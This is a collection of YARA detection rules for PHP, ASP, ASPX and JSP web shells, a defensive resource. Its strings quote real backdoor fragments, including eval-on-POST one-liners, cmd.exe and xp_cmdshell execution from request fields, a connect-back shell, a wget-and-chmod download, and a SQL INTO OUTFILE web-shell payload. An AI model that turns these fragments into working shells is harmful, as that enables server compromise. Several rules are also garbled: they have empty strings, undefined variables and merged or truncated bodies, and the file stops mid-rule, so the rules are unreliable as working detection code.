rule Php_Webshell_webshell_e8eaf8da94012e866e51547cd63bb996379690bf
{
strings:
	$x1 = "@exec('./bypass/ln -s /etc/passwd 1.php');" fullword ascii
	$x2 = "echo \"<iframe src=mysqldumper/index.php width=100% height=100% frameborder=0></iframe> \";" fullword ascii
	$x3 = "@exec('tar -xvf mysqldumper.tar.gz');" fullword ascii
condition:
	( uint16(0) == 0x213c and filesize < 100KB and 1 of ($x*) ) or ( 2 of them )
}
rule Php_Webshell_Unknown_0f06c5d1b32f4994c3b3abf8bb76d5468f105167
{
strings:
	$s1 = "$check = $_SERVER['DOCUMENT_ROOT'] . \"/libraries/lola.php\" ;" fullword ascii
	$s2 = "$fp=fopen(\"$check\",\"w+\");" fullword ascii
	$s3 = "fwrite($fp,base64_decode('" ascii
condition:
	( uint16(0) == 0x6324 and filesize < 2KB and all of them )
}
rule Php_Webshell_WSOShell_0bbebaf46f87718caba581163d4beed56ddf73a7
{
strings:
	$s8 = "$default_charset='Wi'.'ndo.'.'ws-12'.'51';" fullword ascii
	$s9 = "$mosimage_session = \"" fullword ascii
condition:
	( uint16(0) == 0x3f3c and filesize < 300KB and all of them )
}
rule Php_Webshell_WebShell_Generic_1609_A
{
strings:
	$s1 = "return $qwery45234dws($b);" fullword ascii
condition:
	( uint16(0) == 0x3f3c and 1 of them )
}
rule Php_Webshell_Nishang_Webshell
{
strings:
	$s1 = "psi.Arguments = \"-noninteractive \" + \"-executionpolicy bypass \" + arg;" ascii
	$s2 = "output.Text += \"\nPS> \" + console.Text + \"\n\" + do_ps(console.Text);" ascii
	$s3 = "<title>Antak Webshell" fullword ascii
	$s4 = ""
	$foot2 = "();}} @header(\"Status: 404 Not Found\"); ?>"
condition:
	( uint32(0) == 0x68703f3c and filesize < 80KB and ( 3 of them or $head1 at 0 or $head2 in (0..20) or 1 of ($x*) ) ) or $foot1 at (filesize-52) or $foot2 at (filesize-44)
}
rule Php_Webshell_ALFA_SHELL
{
strings:
	$x1 = "$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64')" ascii
	$x2 = "#solevisible@gmail.com" fullword ascii
	$x3 = "'login_page' => '500',//gui or 500 or 403 or 404" fullword ascii
	$x4 = "$GLOBALS['__ALFA__']" fullword ascii
	$x5 = "if(!function_exists('b'.'as'.'e6'.'4_'.'en'.'co'.'de')" ascii
	$f1 = { 76 2F 38 76 2F 36 76 2F 2B 76 2F 2F 66 38 46 27 29 3B 3F 3E 0D 0A }
condition:
	( filesize < 900KB and 2 of ($x*) or $f1 at (filesize-22) )
}
rule Php_Webshell_Webshell_FOPO_Obfuscation_APT_ON_Nov17_1
{
strings:
	$x1 = "Obfuscation provided by FOPO" fullword ascii
	$s1 = "\";@eval($" ascii
	$f1 = { 22 29 29 3B 0D 0A 3F 3E }
condition:
	uint16(0) == 0x3f3c and filesize < 800KB and ( $x1 or ( $s1 in (0..350) and $f1 at (filesize-23) ) )
}
rule Jsp_Webshell_WebShell_JexBoss_JSP_1
{
strings:
	$x1 = "equals(\"jexboss\")"
	$x2 = "%>
    <%if(request.getParameter(\"ppp\") != null &&" ascii
	$s1 = "<%@ page import=\"java.util.*,java.io.*\"%>
    <% if (request.getParameter(\""
	$s2 = "!= null && request.getHeader(\"user-agent\"" ascii
	$s3 = "String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); }}%>" fullword ascii
condition:
	uint16(0) == 0x253c and filesize < 1KB and 1 of ($x*) or 2 of them
}
rule Php_Webshell_WebShell_JexBoss_WAR_1
{
strings:
	$ = "jbossass" fullword ascii
	$ = "jexws.jsp" fullword ascii
	$ = "jexws.jspPK" fullword ascii
	$ = "jexws1.jsp" fullword ascii
	$ = "jexws1.jspPK" fullword ascii
	$ = "jexws2.jsp" fullword ascii
	$ = "jexws2.jspPK" fullword ascii
	$ = "jexws3.jsp" fullword ascii
	$ = "jexws3.jspPK" fullword ascii
	$ = "jexws4.jsp" fullword ascii
	$ = "jexws4.jspPK" fullword ascii
condition:
	uint16(0) == 0x4b50 and filesize < 4KB and 1 of them
}
rule Asp_Webshell_webshell_tinyasp
{
strings:
	$s1 = "Execute Request" ascii wide nocase
condition:
	uint16(0) == 0x253c and filesize < 150 and 1 of them
}
rule Asp_Webshell_WEBSHELL_ASPX_Mar21_1
{
strings:
	$s1 = ".StartInfo.FileName = 'cmd.exe';" ascii fullword
	$s2 = "" ascii fullword
	$s3 = "test\";" ascii fullword
condition:
	uint16(0) == 0x253c and filesize < 6KB and all of them
}
rule Php_Webshell_webshell_php_obfuscated_fopo
{
strings:
	$payload = /(\beval[\t ]*\([^)]|\bassert[\t ]*\([^)])/ nocase ascii
	$one1 = "7QGV2YWwo" wide ascii
	$one2 = "tAZXZhbC" wide ascii
	$one3 = "O0BldmFsK" wide ascii
	$one4 = "sAQABlAHYAYQBsACgA" wide ascii
	$one5 = "7AEAAZQB2AGEAbAAoA" wide ascii
	$one6 = "OwBAAGUAdgBhAGwAKA" wide ascii
	$two1 = "7QGFzc2VydC" wide ascii
	$two2 = "tAYXNzZXJ0K" wide ascii
	$two3 = "O0Bhc3NlcnQo" wide ascii
	$two4 = "sAQABhAHMAcwBlAHIAdAAoA" wide ascii
	$two5 = "7AEAAYQBzAHMAZQByAHQAKA" wide ascii
	$two6 = "OwBAAGEAcwBzAGUAcgB0ACgA" wide ascii
	$php_short = " 1 and ( #chr1 > 10 or #chr2 > 10 or #chr3 > 10 )
}
rule Php_Webshell_webshell_in_image
{
strings:
	$png = { 89 50 4E 47 }
	$jpg = { FF D8 FF E0 }
	$gif = { 47 49 46 38 }
	$gif2 = "gif89"
	$mdb = { 00 01 00 00 53 74 }
	$php_short = "" fullword ascii
	$s3 = "out.print(\"Hi,Man 2015
    \");" fullword ascii
	$s4 = "while((a=in.read(b))!=-1){" fullword ascii
	$s5 = "out.println(new String(b));" fullword ascii
	$s6 = "out.print(\"
    \");" fullword ascii
	$s7 = "out.print(\"
    \");" fullword ascii
	$s8 = "int a = -1;" fullword ascii
	$s9 = "byte[] b = new byte[2048];" fullword ascii
condition:
	filesize < 3KB and 7 of them
}
rule Php_Webshell_trigger_drop
{
strings:
	$s0 = "$_GET['returnto'] = 'database_properties.php';" fullword ascii
	$s1 = "echo(''" ascii
	$s2 = "@mssql_query('DROP TRIGGER" ascii
	$s3 = "if(empty($_GET['returnto']))" fullword ascii
condition:
	filesize < 5KB and all of them
}
rule Php_Webshell_InjectionParameters
{
strings:
	$s0 = "Public Shared ReadOnly Empty As New InjectionParameters(-1, \"\")" fullword ascii
	$s1 = "Public Class InjectionParameters" fullword ascii
condition:
	filesize < 13KB and all of them
}
rule Php_Webshell_users_list
{
strings:
	$s0 = "Create User" fullword ascii
	$s7 = "$skiplist = array('##MS_AgentSigningCertificate##','NT AUTHORITY\\NETWORK SERVIC" ascii
	$s11 = " Default DB " fullword ascii
condition:
	filesize < 12KB and all of them
}
rule Php_Webshell_trigger_modify
{
strings:
	$s1 = "
     \" + SHELL_DIR" fullword ascii
	$s5 = ": \"c:\\\\windows\\\\system32\\\\cmd.exe\")" fullword ascii
condition:
	filesize < 715KB and all of them
}
rule Php_Webshell_reDuhServers_reDuh_2
{
strings:
	$s1 = "errorlog(\"FRONTEND: send_command '\".$data.\"' on port \".$port.\" returned \"." ascii
	$s2 = "$msg = \"newData:\".$socketNumber.\":\".$targetHost.\":\".$targetPort.\":\".$seq" ascii
	$s3 = "errorlog(\"BACKEND: *** Socket key is \".$sockkey);" fullword ascii
condition:
	filesize < 57KB and all of them
}
rule Php_Webshell_Customize_2
{
strings:
	$s1 = "while((l=br.readLine())!=null){sb.append(l+\"\\r\\n\");}}" fullword ascii
	$s2 = "String Z=EC(request.getParameter(Pwd)+\"\",cs);String z1=EC(request.getParameter" ascii
condition:
	filesize < 30KB and all of them
}
rule Php_Webshell_ChinaChopper_one
{
strings:
	$s0 = "<%eval request(" fullword ascii
condition:
	filesize < 50 and all of them
}
rule Php_Webshell_CN_Tools_old
{
strings:
	$s0 = "$sCmd = \"wget -qc \".escapeshellarg($sURL).\" -O \".$sFile;" fullword ascii
	$s1 = "$sURL = \"http://\".$sServer.\"/\".$sFile;" fullword ascii
	$s2 = "chmod(\"/\".substr($sHash, 0, 2), 0777);" fullword ascii
	$s3 = "$sCmd = \"echo 123> \".$sFileOut;" fullword ascii
condition:
	filesize < 6KB and all of them
}
rule Php_Webshell_item_301
{
strings:
	$s1 = "$sURL = \"301:http://\".$sServer.\"/index.asp\";" fullword ascii
	$s2 = "(gov)\\\\.(cn)$/i\", $aURL[\"host\"])" ascii
	$s3 = "$aArg = explode(\" \", $sContent, 5);" fullword ascii
	$s4 = "$sURL = $aArg[0];" fullword ascii
condition:
	filesize < 3KB and 3 of them
}
rule Php_Webshell_CN_Tools_item
{
strings:
	$s1 = "$sURL = \"http://\".$sServer.\"/\".$sWget;" fullword ascii
	$s2 = "$sURL = \"301:http://\".$sServer.\"/\".$sWget;" fullword ascii
	$s3 = "$sWget=\"index.asp\";" fullword ascii
	$s4 = "$aURL += array(\"scheme\" => \"\", \"host\" => \"\", \"path\" => \"\");" fullword ascii
condition:
	filesize < 4KB and all of them
}
rule Php_Webshell_f3_diy
{
strings:
	$s0 = "<%@LANGUAGE=\"VBScript.Encode\" CODEPAGE=\"936\"%>" fullword ascii
	$s5 = ".black {" fullword ascii
condition:
	uint16(0) == 0x253c and filesize < 10KB and all of them
}
rule Php_Webshell_ChinaChopper_temp
{
strings:
	$s0 = "o.run \"ff\",Server,Response,Request,Application,Session,Error" fullword ascii
	$s1 = "Set o = Server.CreateObject(\"ScriptControl\")" fullword ascii
	$s2 = "o.language = \"vbscript\"" fullword ascii
	$s3 = "o.addcode(Request(\"SC\"))" fullword ascii
condition:
	filesize < 1KB and all of them
}
rule Php_Webshell_Tools_2015
{
strings:
	$s0 = "Configbis = new BufferedInputStream(httpUrl.getInputStream());" fullword ascii
	$s4 = "System.out.println(Oute.toString());" fullword ascii
	$s5 = "String ConfigFile = Outpath + \"/\" + request.getParameter(\"ConFile\");" fullword ascii
	$s8 = "HttpURLConnection httpUrl = null;" fullword ascii
	$s19 = "Configbos = new BufferedOutputStream(new FileOutputStream(Outf));;" fullword ascii
condition:
	filesize < 7KB and all of them
}
rule Php_Webshell_ChinaChopper_temp_2
{
strings:
	$s0 = "@eval($_POST[strtoupper(md5(gmdate(" ascii
condition:
	filesize < 150 and all of them
}
rule Php_Webshell_templatr
{
strings:
	$s0 = "eval(gzinflate(base64_decode('" ascii
condition:
	filesize < 70KB and all of them
}
rule Php_Webshell_reDuhServers_reDuh_3
{
strings:
	$s1 = "Response.Write(\"[Error]Unable to connect to reDuh.jsp main process on port \" +" ascii
	$s2 = "host = System.Net.Dns.Resolve(\"127.0.0.1\");" fullword ascii
	$s3 = "rw.WriteLine(\"[newData]\" + targetHost + \":\" + targetPort + \":\" + socketNum" ascii
	$s4 = "Response.Write(\"Error: Bad port or host or socketnumber for creating new socket" ascii
condition:
	filesize < 40KB and all of them
}
rule Php_Webshell_ChinaChopper_temp_3
{
strings:
	$s0 = "<%@ Page Language=\"Jscript\"%><%eval(Request.Item[\"" ascii
	$s1 = "\"],\"unsafe\");%>" ascii
condition:
	uint16(0) == 0x253c and filesize < 150 and all of them
}
rule Asp_Webshell_Shell_Asp
{
strings:
	$s1 = "Session.Contents.Remove(m & \"userPassword\")" fullword ascii
	$s2 = "passWord = Encode(GetPost(\"password\"))" fullword ascii
	$s3 = "function Command(cmd, str){" fullword ascii
condition:
	filesize < 100KB and all of them
}
rule Asp_Webshell_Txt_aspxtag
{
strings:
	$s1 = "String wGetUrl=Request.QueryString[" fullword ascii
	$s2 = "sw.Write(wget);" fullword ascii
	$s3 = "Response.Write(\"Hi,Man 2015\"); " fullword ascii
condition:
	filesize < 2KB and all of them
}
rule Php_Webshell_Txt_php
{
strings:
	$s1 = "$Config=$_SERVER['QUERY_STRING'];" fullword ascii
	$s2 = "gzuncompress($_SESSION['api']),null);" ascii
	$s3 = "sprintf('%s?%s',pack(\"H*\"," ascii
	$s4 = "if(empty($_SESSION['api']))" fullword ascii
condition:
	filesize < 1KB and all of them
}
rule Asp_Webshell_Txt_aspx1
{
strings:
	$s0 = "<%@ Page Language=\"Jscript\"%><%eval(Request.Item["
	$s1 = "],\"unsafe\");%>" fullword ascii
condition:
	filesize < 150 and all of them
}
rule Php_Webshell_Txt_shell
{
strings:
	$s1 = "printf(\"Could not connect to remote shell!\\n\");" fullword ascii
	$s2 = "printf(\"Usage: %s  \\n\", prog);" fullword ascii
	$s3 = "execl(shell,\"/bin/sh\",(char *)0);" fullword ascii
	$s4 = "char shell[]=\"/bin/sh\";" fullword ascii
	$s5 = "connect back door\\n\\n\");" fullword ascii
condition:
	filesize < 2KB and 2 of them
}
rule Asp_Webshell_Txt_asp
{
strings:
	$s1 = "Server.ScriptTimeout=999999999:Response.Buffer=true:On Error Resume Next:BodyCol" ascii
	$s2 = "<%@ LANGUAGE = VBScript.Encode %><%" fullword ascii
condition:
	uint16(0) == 0x253c and filesize < 100KB and all of them
}
rule Asp_Webshell_Txt_asp1
{
strings:
	$s1 = "if ShellPath=\"\" Then ShellPath = \"cmd.exe\"" fullword ascii
	$s2 = "autoLoginEnable=WSHShell.RegRead(autoLoginPath & autoLoginEnableKey)" fullword ascii
	$s3 = "Set DD=CM.exec(ShellPath&\" /c \"&DefCmd)" fullword ascii
	$s4 = "szTempFile = server.mappath(\"cmd.txt\")" fullword ascii
condition:
	filesize < 70KB and 2 of them
}
rule Php_Webshell_Txt_php_2
{
strings:
	$s1 = "function connect($dbhost, $dbuser, $dbpass, $dbname='') {" fullword ascii
	$s2 = "scookie('loginpass', '', -86400 * 365);" fullword ascii
	$s3 = "<?php echo $act.' - '.$_SERVER['HTTP_HOST'];?>" fullword ascii
	$s4 = "Powered by  \" + SHELL_DIR" fullword ascii
	$s2 = "Process pro = Runtime.getRuntime().exec(exe);" fullword ascii
	$s3 = "\"" fullword ascii
	$s4 = "cmd = \"cmd.exe /c set\";" fullword ascii
condition:
	filesize < 715KB and 2 of them
}
rule Asp_Webshell_Txt_aspxlcx
{
strings:
	$s1 = "public string remoteip = " ascii
	$s2 = "=Dns.Resolve(host);" ascii
	$s3 = "public string remoteport = " ascii
	$s4 = "public class PortForward" ascii
condition:
	uint16(0) == 0x253c and filesize < 18KB and all of them
}
rule Php_Webshell_Txt_xiao
{
strings:
	$s1 = "Session.Contents.Remove(m & \"userPassword\")" fullword ascii
	$s2 = "passWord = Encode(GetPost(\"password\"))" fullword ascii
	$s3 = "conn.Execute(\"Create Table FileData(Id int IDENTITY(0,1) PRIMARY KEY CLUSTERED," ascii
	$s4 = "function Command(cmd, str){" fullword ascii
	$s5 = "echo \"if(obj.value=='PageWebProxy')obj.form.target='_blank';\"" fullword ascii
condition:
	filesize < 100KB and all of them
}
rule Asp_Webshell_Txt_aspx
{
strings:
	$s1 = "SQLExec : CmdShell  :  8617.tmp\"&chr(34)" fullword ascii
	$s2 = "strQuery=\"dbcc addextendedproc ('xp_regwrite','xpstar.dll')\"" fullword ascii
	$s3 = "strQuery = \"exec master.dbo.xp_cmdshell '\" & request.form(\"cmd\") & \"'\" " fullword ascii
	$s4 = "session(\"login\")=\"\"" fullword ascii
condition:
	filesize < 15KB and all of them
}
rule Php_Webshell_Txt_hello
{
strings:
	$s0 = "Dim myProcessStartInfo As New ProcessStartInfo(\"cmd.exe\")" fullword ascii
	$s1 = "myProcessStartInfo.Arguments=\"/c \" & Cmd.text" fullword ascii
	$s2 = "myProcess.Start()" fullword ascii
	$s3 = "
    " fullword ascii
condition:
	filesize < 25KB and all of them
}
rule Php_Webshell_webshell_php_obfuscated_encoding
{
strings:
	$enc_eval1 = /(e|\\x65|\\101)(\\x76|\\118)(a|\\x61|\\97)(l|\\x6c|\\108)(\(|\\x28|\\40)/ ascii nocase
	$enc_eval2 = /(\\x65|\\101)(v|\\x76|\\118)(a|\\x61|\\97)(l|\\x6c|\\108)(\(|\\x28|\\40)/ ascii nocase
	$enc_assert1 = /(a|\\97|\\x61)(\\115|\\x73)(s|\\115|\\x73)(e|\\101|\\x65)(r|\\114|\\x72)(t|\\116|\\x74)(\(|\\x28|\\40)/ ascii nocase
	$enc_assert2 = /(\\97|\\x61)(s|\\115|\\x73)(s|\\115|\\x73)(e|\\101|\\x65)(r|\\114|\\x72)(t|\\116|\\x74)(\(|\\x28|\\40)/ ascii nocase
	$php_short = "assert(strpos($styles, $"
	$gfp3 = "$module = new $_GET['module']($_GET['scope']);"
	$gfp4 = "$plugin->$_POST['action']($_POST['id']);"
	$gfp5 = "$_POST[partition_by]($_POST["
	$gfp6 = "$object = new $_REQUEST['type']($_REQUEST['id']);"
	$gfp7 = "The above example code can be easily exploited by passing in a string such as" // ... ;)
	$gfp8 = "Smarty_Internal_Debug::start_render($_template);"
	$gfp9 = "?p4yl04d=UNION%20SELECT%20'',2,3%20INTO%20OUTFILE%20'/var/www/w3bsh3ll.php"
	$gfp10 = "[][}{;|]\\|\\\\[+=]\\|?"
	$gfp11 = "(eval (getenv \"EPROLOG\")))"
	$gfp12 = "ZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9saWNlbnNlLm9wZW5jYXJ0LWFwaS5jb20vbGljZW5zZS5waHA/b3JkZXJ"
	$gfp_3 = " GET /"
	$gfp_4 = " POST /"
condition:
	filesize < 300KB and not ( any of ( $gfp* ) ) and $geval
}
rule Php_Webshell_webshell_php_generic_backticks
{
strings:
	$backtick = /`[\t ]*\$(_POST\[|_GET\[|_REQUEST\[|_SERVER\['HTTP_)/ ascii
	$php_short = "My PHP Shell assert(strpos($styles, $"
	$gfp3 = "$module = new $_GET['module']($_GET['scope']);"
	$gfp4 = "$plugin->$_POST['action']($_POST['id']);"
	$gfp5 = "$_POST[partition_by]($_POST["
	$gfp6 = "$object = new $_REQUEST['type']($_REQUEST['id']);"
	$gfp7 = "The above example code can be easily exploited by passing in a string such as" // ... ;)
	$gfp8 = "Smarty_Internal_Debug::start_render($_template);"
	$gfp9 = "?p4yl04d=UNION%20SELECT%20'',2,3%20INTO%20OUTFILE%20'/var/www/w3bsh3ll.php"
	$gfp10 = "[][}{;|]\\|\\\\[+=]\\|?"
	$gfp11 = "(eval (getenv \"EPROLOG\")))"
	$gfp12 = "ZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9saWNlbnNlLm9wZW5jYXJ0LWFwaS5jb20vbGljZW5zZS5waHA/b3JkZXJ"
condition:
	filesize < 500KB and not ( any of ( $gfp* ) ) and any of ( $sr* )
}
rule Php_Webshell_webshell_php_obfuscated_encoding_mixed_dec_and_hex
{
strings:
	$mix = /['"](\w|\\x?[0-9a-f]{2,3})[\\x0-9a-f]{2,20}\\\d{1,3}[\\x0-9a-f]{2,20}\\x[0-9a-f]{2}\\/ ascii nocase
	$php_short = "1"
	$x2 = ".LoadXml(System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String("
	$s1 = "XsltSettings.TrustedXslt"
	$s2 = "Xml.XmlUrlResolver"
	$s3 = "FromBase64String(Request[\""
condition:
	filesize < 500KB and $csharpshell and (1 of ($x*) or all of ($s*))
}
rule Php_Webshell_CN_Honker_Webshell_PHP_php5
{
strings:
	$s0 = "else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user" ascii /* PEStudio Blacklist: strings */
	$s20 = "echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump').\"\".$" ascii /* PEStudio Blacklist: strings */
condition:
	uint16(0) == 0x3f3c and filesize < 300KB and all of them
}
rule Php_Webshell_CN_Honker_Webshell_test3693
{
strings:
	$s0 = "Process p=Runtime.getRuntime().exec(\"cmd /c \"+strCmd);" fullword ascii /* PEStudio Blacklist: strings */
	$s2 = "http://www.topronet.com \",\"  Thanks for your support - " ascii /* PEStudio Blacklist: strings */
condition:
	uint16(0) == 0x4b50 and filesize < 50KB and all of them
}
rule Php_Webshell_CN_Honker_Webshell_mycode12
{
strings:
	$s1 = "" fullword ascii
condition:
	uint16(0) == 0x433c and filesize < 13KB and all of them
}
rule Php_Webshell_CN_Honker_Webshell_PHP_linux
{
strings:
	$s0 = "" fullword ascii /* PEStudio Blacklist: strings */
	$s1 = "Changing CHMOD Permissions Exploit " fullword ascii
condition:
	uint16(0) == 0x696c and filesize < 6KB and all of them
}
rule Php_Webshell_CN_Honker_Webshell_Interception3389_get
{
strings:
	$s0 = "userip = Request.ServerVariables(\"HTTP_X_FORWARDED_FOR\")" fullword ascii /* PEStudio Blacklist: strings */
	$s1 = "file.writeline  szTime + \" HostName:\" + szhostname + \" IP:\" + userip+\":\"+n" ascii /* PEStudio Blacklist: strings */
	$s3 = "set file=fs.OpenTextFile(server.MapPath(\"WinlogonHack.txt\"),8,True)" fullword ascii /* PEStudio Blacklist: strings */
condition:
	filesize < 3KB and all of them
}
rule Php_Webshell_CN_Honker_Webshell_nc_1
{
strings:
	$s1 = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 " ascii /* PEStudio Blacklist: agent */
	$s2 = "<%if session(\"pw\")<>\"go\" then %>" fullword ascii
condition:
	filesize < 11KB and all of them
}
rule Php_Webshell_CN_Honker_Webshell_PHP_BlackSky
{
strings:
	$s0 = "eval(gzinflate(base64_decode('" ascii /* PEStudio Blacklist: strings */
	$s1 = "B1ac7Sky-->" fullword ascii
condition:
	filesize < 641KB and all of them
}
rule Asp_Webshell_CN_Honker_Webshell_ASP_asp3
{
strings:
	$s1 = "if shellpath=\"\" then shellpath = \"cmd.exe\"" fullword ascii /* PEStudio Blacklist: strings */
	$s2 = "c.open \"GET\", \"http://127.0.0.1:\" & port & \"/M_Schumacher/upadmin/s3\", Tru" ascii /* PEStudio Blacklist: strings */
condition:
	filesize < 444KB and all of them
}
rule Asp_Webshell_CN_Honker_Webshell_ASPX_sniff
{
strings:
	$s1 = "IPHostEntry HosyEntry = Dns.GetHostEntry((Dns.GetHostName()));" fullword ascii /* PEStudio Blacklist: strings */
	$s2 = "if (!logIt && my_s_smtp && (dport == 25 || sport == 25))" fullword ascii /* PEStudio Blacklist: strings */
condition:
	filesize < 91KB and all of them
}
rule Php_Webshell_CN_Honker_Webshell_udf_udf
{
strings:
	$s1 = "<?php // Source  My : Meiam  " fullword ascii /* PEStudio Blacklist: strings */
	$s2 = "$OOO0O0O00=__FILE__;$OOO000000=urldecode('" ascii /* PEStudio Blacklist: strings */
condition:
	filesize < 430KB and all of them
}
rule Jsp_Webshell_CN_Honker_Webshell_JSP_jsp
{
strings:
	$s1 = "<input name=f size=30 value=shell.jsp>" fullword ascii /* PEStudio Blacklist: strings */
	$s2 = "<font color=red>www.i0day.com  By:" fullword ascii
condition:
	filesize < 3KB and all of them
}
rule Php_Webshell_CN_Honker_Webshell_T00ls_Lpk_Sethc_v4_mail
{
strings:
	$s1 = "if (!$this->smtp_putcmd(\"AUTH LOGIN\", base64_encode($this->user)))" fullword ascii /* PEStudio Blacklist: strings */
	$s2 = "$this->smtp_debug(\"> \".$cmd.\"\\n\");" fullword ascii /* PEStudio Blacklist: strings */
condition:
	filesize < 39KB and all of them
}
rule Php_Webshell_CN_Honker_Webshell_phpwebbackup
{
strings:
	$s0 = "<?php // Code By isosky www.nbst.org" fullword ascii
	$s2 = "$OOO0O0O00=__FILE__;$OOO000000=urldecode('" ascii /* PEStudio Blacklist: strings */
condition:
	uint16(0) == 0x3f3c and filesize < 67KB and all of them
}
rule Php_Webshell_CN_Honker_Webshell_dz_phpcms_phpbb
{
strings:
	$s1 = "if($pwd == md5(md5($password).$salt))" fullword ascii /* PEStudio Blacklist: strings */
	$s2 = "function test_1($password)" fullword ascii /* PEStudio Blacklist: strings */
	$s3 = ":\".$pwd.\"\\n---------------------------------\\n\";exit;" fullword ascii
	$s4 = ":user=\".$user.\"\\n\";echo \"pwd=\".$pwd.\"\\n\";echo \"salt=\".$salt.\"\\n\";" fullword ascii
condition:
	filesize < 22KB and all of them
}
rule Php_Webshell_CN_Honker_Webshell_picloaked_1
{
strings:
	$s0 = "<?php eval($_POST[" ascii /* PEStudio Blacklist: strings */
	$s1 = ";<%execute(request(" ascii /* PEStudio Blacklist: strings */
	$s3 = "GIF89a" fullword ascii /* Goodware String - occured 318 times */
condition:
	filesize < 6KB and 2 of them
}
rule Php_Webshell_CN_Honker_Webshell_assembly
{
strings:
	$s0 = "response.write oScriptlhn.exec(\"cmd.exe /c\" & request(\"c\")).stdout.readall" fullword ascii /* PEStudio Blacklist: strings */
condition:
	filesize < 1KB and all of them
}
rule Php_Webshell_CN_Honker_Webshell_PHP_php8
{
strings:
	$s0 = "<a href=\"http://hi.baidu.com/ca3tie1/home\" target=\"_blank\">Ca3tie1's Blog</a" ascii /* PEStudio Blacklist: strings */
	$s1 = "function startfile($path = 'dodo.zip')" fullword ascii /* PEStudio Blacklist: strings */
	$s3 = "<form name=\"myform\" method=\"post\" action=\"\">" fullword ascii /* PEStudio Blacklist: strings */
	$s5 = "$_REQUEST[zipname] = \"dodozip.zip\"; " fullword ascii /* PEStudio Blacklist: strings */
condition:
	filesize < 25KB and 2 of them
}
rule Php_Webshell_CN_Honker_Webshell_Tuoku_script_xx
{
strings:
	$s0 = "$mysql.=\"insert into `$table`($keys) values($vals);\\r\\n\";" fullword ascii /* PEStudio Blacklist: strings */
	$s2 = "$mysql_link=@mysql_connect($mysql_servername , $mysql_username , $mysql_password" ascii /* PEStudio Blacklist: strings */
	$s16 = "mysql_query(\"SET NAMES gbk\");" fullword ascii /* PEStudio Blacklist: strings */
condition:
	filesize < 2KB and all of them
}
rule Jsp_Webshell_CN_Honker_Webshell_JSPMSSQL
{
strings:
	$s1 = "<form action=\"?action=operator&cmd=execute\"" fullword ascii /* PEStudio Blacklist: strings */
	$s2 = "String sql = request.getParameter(\"sqlcmd\");" fullword ascii /* PEStudio Blacklist: strings */
condition:
	filesize < 35KB and all of them
}
rule Php_Webshell_CN_Honker_Webshell_Injection_Transit_jmPost
{
strings:
	$s1 = "response.write  PostData(JMUrl,JmStr,JmCok,JmRef)" fullword ascii /* PEStudio Blacklist: strings */
	$s2 = "JmdcwName=request(\"jmdcw\")" fullword ascii /* PEStudio Blacklist: strings */
condition:
	filesize < 9KB and all of them
}
rule Asp_Webshell_CN_Honker_Webshell_ASP_web_asp
{
strings:
	$s0 = "<FORM method=post target=_blank>ShellUrl: <INPUT " fullword ascii /* PEStudio Blacklist: strings */
	$s1 = "\" >[Copy code]</a> 4ngr7   </td>" fullword ascii
condition:
	filesize < 13KB and all of them
}
rule Asp_Webshell_CN_Honker_Webshell_wshell_asp
{
strings:
	$s1 = "file1.Write(\"<%response.clear:execute request(\\\"root\\\"):response.End%>\");" fullword ascii /* PEStudio Blacklist: strings */
	$s2 = "hello word !  " fullword ascii /* PEStudio Blacklist: strings */
	$s3 = "root.asp " fullword ascii
condition:
	filesize < 5KB and all of them
}
rule Asp_Webshell_CN_Honker_Webshell_ASP_asp404
{
strings:
	$s0 = "temp1 = Len(folderspec) - Len(server.MapPath(\"./\")) -1" fullword ascii /* PEStudio Blacklist: strings */
	$s1 = "<form name=\"form1\" method=\"post\" action=\"<%= url%>?action=chklogin\">" fullword ascii /* PEStudio Blacklist: strings */
	$s2 = "<td> <a href=\"<%=tempurl+f1.name%>\" target=\"_blank\"><%=f1.name%></a></t" ascii /* PEStudio Blacklist: strings */
condition:
	filesize < 113KB and all of them
}
rule Asp_Webshell_CN_Honker_Webshell_Serv_U_asp
{
strings:
	$s1 = "newuser = \"-SETUSERSETUP\" & vbCrLf & \"-IP=0.0.0.0\" & vbCrLf & \"-PortNo=\" &" ascii /* PEStudio Blacklist: strings */
	$s2 = "<td><input name=\"c\" type=\"text\" id=\"c\" value=\"cmd /c net user goldsun lov" ascii /* PEStudio Blacklist: strings */
	$s3 = "deldomain = \"-DELETEDOMAIN\" & vbCrLf & \"-IP=0.0.0.0\" & vbCrLf & \" PortNo=\"" ascii /* PEStudio Blacklist: strings */
condition:
	filesize < 30KB and 2 of them
}
rule Php_Webshell_CN_Honker_Webshell_cfm_list
{
strings:
	$s1 = "<TD><a href=\"javascript:ShowFile('#mydirectory.name#')\">#mydirectory.name#</a>" ascii /* PEStudio Blacklist: strings */
	$s2 = "<TD>#mydirectory.size#</TD>" fullword ascii
condition:
	filesize < 10KB and all of them
}
rule Php_Webshell_CN_Honker_Webshell_PHP_php2
{
strings:
	$s1 = "$OOO0O0O00=__FILE__;$OOO000000=urldecode('" ascii /* PEStudio Blacklist: strings */
	$s2 = "<?php // Black" fullword ascii
condition:
	filesize < 12KB and all of them
}
rule Php_Webshell_CN_Honker_Webshell_Tuoku_script_oracle
{
strings:
	$s1 = "String url=\"jdbc:oracle:thin:@localhost:1521:orcl\";" fullword ascii /* PEStudio Blacklist: strings */
	$s2 = "String user=\"oracle_admin\";" fullword ascii /* PEStudio Blacklist: strings */
	$s3 = "String sql=\"SELECT 1,2,3,4,5,6,7,8,9,10 from user_info\";" fullword ascii
condition:
	filesize < 7KB and all of them
}
rule Asp_Webshell_CN_Honker_Webshell_ASPX_aspx4
{
strings:
	$s4 = "File.Delete(cdir.FullName + \"\\\\test\");" fullword ascii /* PEStudio Blacklist: strings */
	$s5 = "start<asp:TextBox ID=\"Fport_TextBox\" runat=\"server\" Text=\"c:\\\" Width=\"60" ascii /* PEStudio Blacklist: strings */
	$s6 = "<div>Code By <a href =\"http://www.hkmjj.com\">Www.hkmjj.Com</a></div>" fullword ascii
condition:
	filesize < 11KB and all of them
}
rule Asp_Webshell_CN_Honker_Webshell_ASPX_aspx
{
strings:
